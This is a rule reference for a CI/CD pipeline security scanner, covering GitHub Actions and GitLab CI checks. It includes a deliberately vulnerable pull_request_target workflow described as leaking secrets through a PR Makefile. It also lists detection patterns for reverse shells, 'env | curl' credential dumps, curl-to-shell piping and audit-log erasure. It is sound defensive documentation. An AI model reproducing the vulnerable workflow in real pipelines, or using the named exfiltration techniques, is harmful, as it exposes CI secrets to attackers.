How this is detected. GHA-002 catches actions/checkout with ref: ${{ github.event.pull_request.head.sha }}. The same primitive shows up as gh pr checkout, git fetch origin pull/<N>/head, and git checkout of an attacker-controlled SHA expression inside a run: block. They all land the same bytes in the workspace with the same privileged context active, so they get the same severity.

Recommendation. Don't materialize the PR head in a pull_request_target or workflow_run job. If you need to inspect PR content, split the workflow: a privileged half (with secrets) that uses metadata only (PR number, base ref, label) and an unprivileged pull_request half that builds the code with no secrets in scope.

Seen in the wild.

  • GitHub Security Lab: Preventing pwn requests (2020) listed manual git fetch pull/<N>/head as one of the equivalent ways teams shoot themselves in the foot. Auditors checking only actions/checkout miss the shell-level variants entirely.

Proof of exploit.

Vulnerable: pull_request_target + gh pr checkout.

name: triage
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test-pr:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@   # base, looks safe
      - run: gh pr checkout ${{ github.event.number }}
        env:
          GH_TOKEN: ${{ github.token }}
      - run: make test   # now runs PR Makefile

Attack: same as GHA-002. The PR ships a Makefile that exfils $GITHUB_TOKEN and every ${{ secrets.* }} the pull_request_target context exposes. GHA-002's pattern match never fires because actions/checkout looks innocent; the PR content lands via the shell instead.

Safe: don't materialize PR content with secrets active. Move the build to a pull_request workflow:

name: build
on: { pull_request: {} }
jobs:
  test-pr:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@   # PR head, no secrets
      - run: make test

Source: GHA-046 in the GitHub Actions provider.

GHA-047: Action ref resolves to a recently committed tag or SHA MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. Reads ref_committed_at from ctx.action_metadata[owner/repo] (populated by the --resolve-remote path via GET /repos/{owner}/{repo}/commits/{ref}). Fires when the referenced ref's commit date is younger than MIN_REF_AGE_DAYS (7). Trusted publishers (actions, aws-actions, azure, ...) are skipped by default to avoid firing on legitimate retags of floating majors; pin to a SHA to opt those back in. Without --resolve-remote the rule passes silently with a discovery nudge.

Recommendation. Wait until the referenced tag or commit has had time to be reviewed by the upstream community before pulling it into CI; the default cooldown is seven days. Either bump the pinned ref to an older release, or wait out the cooldown and re-run. If the action is internal / first-party and the freshness gate is unwanted, pin to a 40-char commit SHA: SHA pins don't move under a retag and are the preferred long-term mitigation.

Known false positives.

  • A legitimate first-party action that's outside the default trusted-publisher allowlist (a small vendor org that publishes a real action; you'd like it included) will fire after every release for the cooldown window. Either pin to a SHA (preferred) or suppress via ignore-file with a dated note; the suppression decays once the ref ages past the threshold.

Seen in the wild.

  • Multiple action-tag compromises (ua-parser-js npm 2021, tj-actions/changed-files 2025) followed the same shape: a tag was re-pointed at a malicious commit and consumers pulling on the next CI run executed the payload. Cooldown gating turns the community-detection window into a defense.

Source: GHA-047 in the GitHub Actions provider.

GL-001: Image not pinned to specific version or digest HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Floating tags (latest or major-only) can be silently swapped under the job. Every image: reference should pin a specific version tag or digest.

Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag (e.g. python:3.12.1-slim). Avoid :latest and bare tags like :3.
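A before/after sketch (the digest is a placeholder, not a real resolved digest; resolve the actual one with docker buildx imagetools inspect):

```yaml
# Fails GL-001: floating tags can be silently repointed by the registry.
# image: python:3
# image: python:latest

# Passes: full immutable version tag plus digest (placeholder digest shown).
image: python:3.12.1-slim@sha256:0000000000000000000000000000000000000000000000000000000000000000
```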

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-001 in the GitLab CI provider.

GL-002: Script injection via untrusted commit/MR context HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE and friends are populated from SCM event metadata the attacker controls. Interpolating them into a shell body executes the crafted content as part of the build.

Recommendation. Read these values into intermediate variables: entries or shell variables and quote them defensively ("$BRANCH"). Never inline $CI_COMMIT_MESSAGE / $CI_MERGE_REQUEST_TITLE into a shell command.
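A minimal sketch of the recommended shape (job name and command are illustrative):

```yaml
notify:
  variables:
    BRANCH: $CI_COMMIT_REF_NAME       # materialize the value as data first
  script:
    # Quoted expansion: shell metacharacters in a crafted branch name stay inert.
    - echo "Building branch: $BRANCH"
    # Never inline it unquoted, e.g.: echo Building $CI_COMMIT_REF_NAME
```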

Source: GL-002 in the GitLab CI provider.

GL-003: Variables contain literal secret values CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Scans variables: at the top level and on each job for entries whose KEY looks credential-shaped and whose VALUE is a literal string (not a $VAR reference). AWS access keys are detected by value pattern regardless of key name.

Recommendation. Store credentials as protected + masked CI/CD variables in project or group settings, and reference them by name from the YAML. For cloud access prefer short-lived OIDC tokens.
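A sketch of the failing vs passing shape (token placeholder and URL variable are illustrative):

```yaml
# Fails GL-003: literal, credential-shaped value in the YAML.
# variables:
#   DEPLOY_API_TOKEN: "glpat-xxxxxxxxxxxxxxxxxxxx"

# Passes: the value lives in project/group CI/CD settings (protected + masked);
# the YAML only references the variable by name.
deploy:
  script:
    - curl --header "PRIVATE-TOKEN: $DEPLOY_API_TOKEN" "$DEPLOY_URL"
```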

Source: GL-003 in the GitLab CI provider.

GL-004: Deploy job lacks manual approval or environment gate MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A job whose stage or name contains deploy / release / publish / promote should either require manual approval or declare an environment: binding. Otherwise any push to the trigger branch ships to the target.

Recommendation. Add when: manual (optionally with rules: for protected branches) or bind the job to an environment: with a deployment tier so approvals and audit are enforced by GitLab's environment controls.
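A sketch of a gated deploy job under those recommendations (job name, script, and branch are illustrative):

```yaml
deploy-prod:
  stage: deploy
  script:
    - ./deploy.sh production
  when: manual
  allow_failure: false    # see GL-029: manual jobs default to allow_failure: true
  environment:
    name: production      # approvals and audit come from GitLab's environment controls
  rules:
    - if: $CI_COMMIT_BRANCH == "main"
```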

Source: GL-004 in the GitLab CI provider.

GL-005: include: pulls remote / project without pinned ref HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Cross-project and remote includes can be silently re-pointed. Branch-name refs (main/master/develop/head) are treated as unpinned; tag and SHA refs are considered safe.

Recommendation. Pin include: project: entries with ref: set to a tag or commit SHA. Avoid include: remote: for untrusted URLs; mirror the content into a trusted project and pin it.
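A sketch with a hypothetical template project and tag:

```yaml
include:
  # Fails GL-005: a branch ref follows the branch head.
  # - project: platform/ci-templates
  #   ref: main
  #   file: /templates/build.yml

  # Passes: pinned to a tag (a 40-char commit SHA works too).
  - project: platform/ci-templates
    ref: v1.4.2
    file: /templates/build.yml
```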

Source: GL-005 in the GitLab CI provider.

GL-006: Artifacts not signed MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts can't be verified downstream, so a tampered build is indistinguishable from a legitimate one. Pass when any of cosign / sigstore / slsa-* / notation-sign appears in the pipeline text.

Recommendation. Add a job that runs cosign sign (keyless OIDC with GitLab's id_tokens works out of the box) or notation sign. Publish the signature next to the artifact and verify it on consume.
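A minimal keyless-signing sketch using GitLab id_tokens (the $IMAGE_DIGEST variable is an assumed placeholder; cosign picks up the SIGSTORE_ID_TOKEN variable for keyless OIDC):

```yaml
sign:
  stage: release
  id_tokens:
    SIGSTORE_ID_TOKEN:
      aud: sigstore
  script:
    # Sign by digest so the signature binds to immutable bytes.
    - cosign sign --yes "$CI_REGISTRY_IMAGE@$IMAGE_DIGEST"
```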

Source: GL-006 in the GitLab CI provider.

GL-007: SBOM not produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact. Passes when CycloneDX / syft / anchore / spdx-sbom-generator / sbom-tool / Trivy-SBOM appears in the pipeline body.

Recommendation. Add an SBOM step: syft . -o cyclonedx-json, Trivy with --format cyclonedx, or GitLab's built-in CycloneDX dependency-scanning template. Attach the SBOM as a pipeline artifact.

Source: GL-007 in the GitLab CI provider.

GL-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements GL-003 (which looks at variables: block keys). GL-008 scans every string in the pipeline against the cross-provider credential-pattern catalog, catching secrets pasted into script: bodies or environment blocks where the name-based detector can't see them.

Recommendation. Rotate the exposed credential immediately. Move the value to a protected + masked CI/CD variable and reference it by name. For cloud access prefer short-lived OIDC tokens.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: GL-008 in the GitLab CI provider.

GL-009: Image pinned to version tag rather than sha256 digest LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. GL-001 fails floating tags at HIGH; GL-009 is the stricter tier. Even immutable-looking version tags (python:3.12.1) can be repointed by registry operators. Digest pins are the only tamper-evident form.

Recommendation. Resolve each image to its current digest (docker buildx imagetools inspect <ref> prints it) and replace the tag with @sha256:<digest>. Automate refreshes with Renovate.

Source: GL-009 in the GitLab CI provider.

GL-010: Multi-project pipeline ingests upstream artifact unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. needs: { project: ..., artifacts: true } pulls artifacts from another project's pipeline. If that upstream project accepts MR pipelines, the artifact may have been built by attacker-controlled code.

Recommendation. Add a verification step before consuming the artifact: cosign verify-attestation, sha256sum -c, or gpg --verify against a manifest signed by the upstream project's release key. Only consume artifacts produced by upstream pipelines whose origin you can trust.
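A sketch of the verify-before-consume step (project path, job name, ref, and manifest filenames are illustrative):

```yaml
consume:
  needs:
    - project: group/upstream
      job: build
      ref: v2.3.1
      artifacts: true
  script:
    # Verify the manifest's signature, then the artifact hashes,
    # before anything from the upstream pipeline is executed or packaged.
    - gpg --verify SHA256SUMS.asc SHA256SUMS
    - sha256sum -c SHA256SUMS
```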

Source: GL-010 in the GitLab CI provider.

GL-011: include: local file pulled in MR-triggered pipeline HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. include: local: '<path>' resolves from the current pipeline's checked-out tree. On an MR pipeline the tree is the MR source branch, so the MR author controls the included YAML content.

Recommendation. Move the included template into a separate, read-only project and reference it via include: project: ... ref: <sha-or-tag>. That way the included content is fixed at MR creation time and not editable from the MR branch.

Source: GL-011 in the GitLab CI provider.

GL-012: Cache key derives from MR-controlled CI variable MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GitLab caches restore by key prefix. When the key includes an MR-controlled variable, an attacker can poison a cache entry that a later default-branch pipeline restores.

Recommendation. Build the cache key from values the MR can't control: lockfile contents (files: [Cargo.lock]), the job name, and $CI_PROJECT_NAMESPACE. Never reference $CI_MERGE_REQUEST_* or $CI_COMMIT_BRANCH from a cache key namespace.
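A sketch of a cache key built only from MR-independent inputs:

```yaml
build:
  cache:
    key:
      files:
        - Cargo.lock            # key follows lockfile contents
      prefix: "$CI_JOB_NAME"    # job name is not attacker-controllable
    paths:
      - target/
  script:
    - cargo build --locked
```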

Source: GL-012 in the GitLab CI provider.

GL-013: AWS auth uses long-lived access keys MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values in CI/CD variables can't be rotated on a fine-grained schedule. GitLab supports OIDC via id_tokens: for short-lived credential injection.

Recommendation. Use GitLab CI/CD OIDC with id_tokens: to obtain short-lived AWS credentials via sts:AssumeRoleWithWebIdentity. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from CI/CD variables.
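A sketch of the OIDC exchange (role ARN and audience are placeholders; the aud value must match the audience configured on the IAM identity provider):

```yaml
deploy:
  id_tokens:
    AWS_OIDC_TOKEN:
      aud: https://gitlab.example.com
  script:
    # Trade the short-lived CI token for short-lived AWS credentials.
    - >
      aws sts assume-role-with-web-identity
      --role-arn "$AWS_ROLE_ARN"
      --role-session-name "ci-$CI_JOB_ID"
      --web-identity-token "$AWS_OIDC_TOKEN"
      --duration-seconds 900
```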

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-013 in the GitLab CI provider.

GL-014: Self-managed runner without ephemeral tag MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Self-managed runners that don't tear down between jobs leak filesystem and process state. The check looks for an ephemeral tag on any job whose tags: list doesn't match SaaS-only runner names.

Recommendation. Register the runner with --executor docker + --docker-pull-policy always so containers are fresh per job, and add an ephemeral tag. Alternatively use the GitLab Runner Operator with autoscaling.

Source: GL-014 in the GitLab CI provider.

GL-015: Job has no timeout, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without an explicit timeout, the job runs until the instance-level default (typically 60 minutes). Explicit timeouts cap blast radius and the window during which a compromised script has access to CI/CD variables.

Recommendation. Add timeout: to each job (e.g. timeout: 30 minutes), sized to the 95th percentile of historical runtime. GitLab's default is 60 minutes (or the instance admin setting).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-015 in the GitLab CI provider.

GL-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
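A sketch of the download-verify-execute pattern (URL and checksum are placeholders):

```yaml
install-tool:
  script:
    - curl -fsSLo install.sh https://example.com/install.sh
    # Pin the expected checksum in the repo; the job fails on any drift.
    - echo "<expected-sha256>  install.sh" | sha256sum -c -
    - sh install.sh
```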

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: GL-016 in the GitLab CI provider.

GL-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the CI runner, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-017 in the GitLab CI provider.

GL-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a pipeline. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-018 in the GitLab CI provider.

GL-019: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
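One possible shape, using trivy (the pinned tag is illustrative; see GL-001/GL-009 for pinning guidance):

```yaml
vuln-scan:
  stage: test
  image:
    name: aquasec/trivy:0.50.1
    entrypoint: [""]    # run the script shell, not the image's trivy entrypoint
  script:
    # Fail the pipeline on known HIGH/CRITICAL findings in the workspace.
    - trivy fs --exit-code 1 --severity HIGH,CRITICAL .
```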

Source: GL-019 in the GitLab CI provider.

GL-020: CI_JOB_TOKEN written to persistent storage CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detects patterns where CI_JOB_TOKEN is redirected to a file, piped through tee, or appended to dotenv/artifact paths. Persisted tokens survive the job boundary and can be read by later stages, downloaded artifacts, or cache entries, turning a scoped credential into a long-lived one.

Recommendation. Never write CI_JOB_TOKEN to files, artifacts, or dotenv reports. Use the token inline in the command that needs it and let GitLab revoke it automatically when the job finishes.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-020 in the GitLab CI provider.

GL-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-021 in the GitLab CI provider.

GL-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: GL-022 in the GitLab CI provider.

GL-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-023 in the GitLab CI provider.

GL-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. cosign sign and cosign attest look similar but mean different things: the first binds identity to bytes; the second binds a structured claim (builder, source, inputs) to the artifact. SLSA Build L3 verifiers check the latter.

Recommendation. Add a job that runs cosign attest against a provenance.intoto.jsonl statement, or adopt a SLSA-aware builder (the SLSA project ships GitLab templates). Signing the artifact (GL-006) isn't enough for SLSA L3; the attestation describes how the build ran.

Source: GL-024 in the GitLab CI provider.

GL-025: Pipeline contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Fires on concrete indicators (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, webhook.site callbacks, env | curl credential dumps, history -c audit erasure). Orthogonal to GL-016 (curl pipe) and GL-017 (Docker insecure flags). Those flag risky defaults; this flags evidence.

Recommendation. Treat as a potential compromise. Identify the MR that added the matching job(s), rotate any credentials the pipeline can reach, and audit recent runs for outbound traffic to the matched hosts. A legitimate red-team exercise should be time-bounded via .pipelinecheckignore with expires:.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: GL-025 in the GitLab CI provider.

GL-026: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. eval, sh -c "$X", and `$X` all re-parse the variable's value as shell syntax. Once a CI variable feeds into one of these idioms, any ;, &&, |, backtick, or $() in the value executes. Even if the variable's source is currently trusted, future refactors may expose it.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec of variables with direct command invocation. If the command must be dynamic, pass arguments as array members or validate the input against an allow-list at the boundary.
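An allow-list sketch for the dynamic-command case (variable and task names are illustrative):

```yaml
run-task:
  script:
    # Instead of: eval "$TASK_CMD"
    # validate the input at the boundary, then invoke directly:
    - |
      case "$TASK" in
        build|test|lint) make "$TASK" ;;
        *) echo "unknown task: $TASK" >&2; exit 1 ;;
      esac
```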

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal, and only its output is eval'd.

Source: GL-026 in the GitLab CI provider.

GL-027: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements GL-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs all bypass the registry integrity controls the lockfile relies on; an attacker who can move a branch head, drop a sibling checkout, or change a served tarball can substitute code into the build.

Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to an internal registry instead of installing from a filesystem path or tarball URL.

Source: GL-027 in the GitLab CI provider.

GL-028: services: image not pinned HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. services: entries (top-level or per-job) can be either a string (redis:7) or a dict ({name: redis:7, alias: cache}). Both forms are normalized via image_ref-style extraction and evaluated with the same floating-tag regex GL-001 uses for image:.

Recommendation. Pin every services: entry the same way image: is pinned. Prefer @sha256:<digest>, or at minimum a full immutable version tag (postgres:16.2-alpine). Avoid :latest and bare tags like :16.

Source: GL-028 in the GitLab CI provider.

GL-029: Manual deploy job defaults to allow_failure: true MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. This is the most common GitLab deployment gotcha: a manual deploy job looks like a gate in the UI, but the pipeline reports success on the first run because the job is marked allow_failure by default. Downstream jobs (and the overall pipeline status) proceed as though the human approved.

Recommendation. Add allow_failure: false to every deploy-like when: manual job. GitLab defaults allow_failure to true for manual jobs, which makes the pipeline report success whether or not the operator clicks: exactly the opposite of the gate you meant to add.
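A minimal sketch of the fixed shape (job name and script are illustrative):

```yaml
deploy-prod:
  stage: deploy
  when: manual
  allow_failure: false   # block the pipeline until an operator actually clicks
  script:
    - ./deploy.sh
```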

Source: GL-029 in the GitLab CI provider.

GL-030: trigger: include: pulls child pipeline without pinned ref HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. GL-005 only audits top-level include:. Parent-child and multi-project pipelines that load YAML via the job-level trigger: include: slot slip through. Branch refs (main/master/develop/head) count as unpinned.

Recommendation. Pin trigger: include: project: entries with ref: set to a tag or commit SHA. Avoid trigger: include: remote: for untrusted URLs; mirror the content into a trusted project and pin it there.

Source: GL-030 in the GitLab CI provider.

GL-031: id_tokens: missing audience pin or environment binding HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008. IAM-008 verifies the cloud-side trust policy pins audience + subject; this rule verifies the GitLab-side workflow can't request a token without an audience claim or without a deployment gate.

Recommendation. For every job that declares an id_tokens: block, pin a non-wildcard aud: (a literal string the consumer trusts) AND bind the job to a protected environment:. Audience pinning prevents token replay against unintended consumers; the environment binding gates which refs can drive the assume-role on the consumer side.
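A sketch of a compliant id_tokens block (audience URL, token name, and script are illustrative):

```yaml
deploy:
  id_tokens:
    DEPLOY_ID_TOKEN:
      aud: https://vault.example.com   # literal, non-wildcard audience
  environment:
    name: production                   # protected environment gates which refs deploy
  script:
    - ./assume-and-deploy.sh "$DEPLOY_ID_TOKEN"
```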

Source: GL-031 in the GitLab CI provider.

GL-032: tags: interpolates untrusted CI variable HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. GL-014 catches self-managed runners that aren't ephemeral; this rule catches the upstream targeting choice. When tags: is computed from an attacker-controllable CI variable, the operator (or anyone who can craft a PR title / branch name / commit message that the workflow consumes) picks where the job runs, including any privileged tag the instance exposes (deploy-prod, signer, hsm …). The rule reuses the same untrusted-context catalog as GL-002 (CI_COMMIT_MESSAGE, CI_COMMIT_REF_NAME, CI_MERGE_REQUEST_TITLE and friends) so the two rules stay in lockstep.

Recommendation. Hard-code tags: to a specific runner tag list. If runner selection has to be parameterised, validate the candidate value against an explicit allowlist in a job rules: block before the job runs, and never accept a $CI_COMMIT_* / $CI_MERGE_REQUEST_* field as a tag value directly.
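One way to express the safe pattern (tag names and the RUNNER_TAG variable are illustrative):

```yaml
build:
  tags: [linux-build]        # hard-coded runner tag list
  script:
    - make build

# If selection must be parameterised, gate on an explicit allowlist first:
deploy:
  tags: [$RUNNER_TAG]
  rules:
    - if: '$RUNNER_TAG == "deploy-staging" || $RUNNER_TAG == "deploy-prod"'
  script:
    - ./deploy.sh
```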

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Workflows that intentionally select runners by environment via a vetted variables: block (RUNNER_TAG: deploy-prod) referencing a build-time-set value are out of scope; the rule only matches the curated untrusted-predefined-variable catalog. Static custom variables ($DEPLOY_FLEET defined inside the workflow file) are intentionally not flagged.

Source: GL-032 in the GitLab CI provider.

GL-033: Global before_script / after_script propagates taint to every job HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GL-002 catches injection in per-job before_script: / script: / after_script:, but its scanner walks iter_jobs which deliberately skips top-level keywords (before_script, after_script, default, image, services, variables, stages, workflow, include, ...). That means a tainted $CI_COMMIT_TITLE interpolation in a document-root before_script: or default.before_script: evades GL-002 entirely, even though it propagates to every job in the pipeline.

GL-033 closes that gap. It scans:

  • before_script: at document root
  • after_script: at document root
  • default.before_script: (the modern form)
  • default.after_script:

for direct interpolation of the same attacker-controllable predefined variables tracked by GL-002 (CI_COMMIT_TITLE / CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE / CI_MERGE_REQUEST_SOURCE_BRANCH_NAME / etc.). The detection mirrors GL-002's has_direct_taint helper so the quote-aware semantics are identical.

Recommendation. Move any setup logic that touches commit / MR metadata out of the document-root before_script: (and default.before_script: / default.after_script:) and into a dedicated job that opts in via extends: or that runs on a known-safe trigger only. The global before-script runs verbatim before every job in the pipeline (including child pipelines launched by trigger:include:); a single unquoted $CI_COMMIT_TITLE interpolation there is, in effect, that injection in N jobs at once. Quote the value defensively (branch="$CI_COMMIT_REF_NAME") and copy it into a job-local variable before any further use.
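A sketch of the refactor (job and variable names are illustrative):

```yaml
# Before: a document-root before_script like
#   before_script:
#     - echo "building $CI_COMMIT_TITLE"
# taints every job in the pipeline.

default:
  before_script:
    - echo "starting job $CI_JOB_NAME"   # static text only at the global level

.commit-banner:
  before_script:
    - title="$CI_COMMIT_TITLE"           # quoted copy into a job-local variable
    - printf '%s\n' "building: $title"

build:
  extends: .commit-banner
  script:
    - make build
```

Only the jobs that opt in via extends: ever see the commit metadata.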

Known false positives.

  • Some self-hosted GitLab installations build a diagnostic banner into the global before_script that echoes commit metadata for log-correlation purposes. Suppress per pipeline file rather than globally; the rule is checking propagation reach, not intent.

Source: GL-033 in the GitLab CI provider.

HELM-001: Chart.yaml declares legacy apiVersion: v1 MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

